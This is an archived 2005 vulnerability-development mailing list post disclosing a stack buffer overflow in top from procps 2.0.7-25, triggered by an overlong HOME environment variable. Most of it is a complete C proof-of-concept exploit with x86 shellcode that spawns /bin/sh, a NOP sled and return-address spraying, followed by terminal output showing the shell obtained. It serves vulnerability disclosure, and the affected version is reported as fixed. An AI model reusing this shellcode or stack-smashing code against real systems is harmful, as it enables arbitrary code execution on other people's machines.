Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

top (procps-2.0.7-25) vulnerability

From: WINNY THOMAS <winnymthomas () yahoo com>
Date: Fri, 6 May 2005 21:30:19 -0700 (PDT)
While running top on a tool of mine to do a profiling 
test the top command ran into a segmentation fault. I
could find two instance where the command could
misbehave
 
1.                   if you have junk data inside a
file .toprc in your home directory
2.                   if your environmental variable
HOME is set to a string that’s greater than 1024.
 
I managed to spawn a shell out of top command by
exploiting the second issue. If you compile and run
the exploit code which I am including in the mail body
you will get a shell. Incase you don’t you could pass
parameters to the program as follows to adjust the
offset. 
The vulnerability detail is included in the code
comment
 
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas@r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit
 
in most of the test I did on the vulnerable code I got
shell on my system without passing any parameter to
the program (that is the hardcoded offset of 1111 in
my program worked well on my system)
 
/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulerability: in top.c the function get_options
uses strcpy to copy the value of the 
 * environment variable HOME into a static buffer that
is allocated on the stack. hence 
 * its possible to apply standard stack smashing
attack to overwrite the return address 
 * on the stack and execute a code which is of the
attackers choice
 *      NOTE: top is not setuid and hence the exploit wont
spawn a root shell. 
 *      Tested on Red Hat 8 with procps verion 2.0.7-25.
the problem has  
 *    been fixed in the latest versions
 *
 * This code is for educational purpose only and the  
 * author shall not bear any responsibility for any 
 * damage caused by using this code
 */
 
#include <stdio.h>
#include <stdlib.h>
 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
 
char exploit_variable[1200];
 
long get_esp(void)
{
        __asm__("movl %esp, %eax");
}
 
int main(int argc, char *argv[])
{
        long stackp, retaddr;
        char SETENV[1250];
        long *ptr;
        int i, j, offset = 1111;
 
        if (argc > 1)
            offset = atoi(argv[1]);
 
        stackp = get_esp();
        retaddr = stackp - offset;
 
        ptr = exploit_variable;
        for (i = 0; i < 1200; i += 4)
            *ptr++ = retaddr;
 
        for (i = 0; i < 600; i++) 
            exploit_variable[i] = '\x90';
 
        for (j = 0 ;j < strlen(shellcode); j++, i++)
            exploit_variable[i] = shellcode[j];
 
        sprintf(SETENV, "HOME=");
        strcat(SETENV, exploit_variable);
        putenv(SETENV);
        execl("/usr/bin/top", "top", (char *)0);
}
 




                
__________________________________ 
Do you Yahoo!? 
Make Yahoo! your home page 
http://www.yahoo.com/r/hs
Previous By Date Next
Previous By Thread Next

Current thread: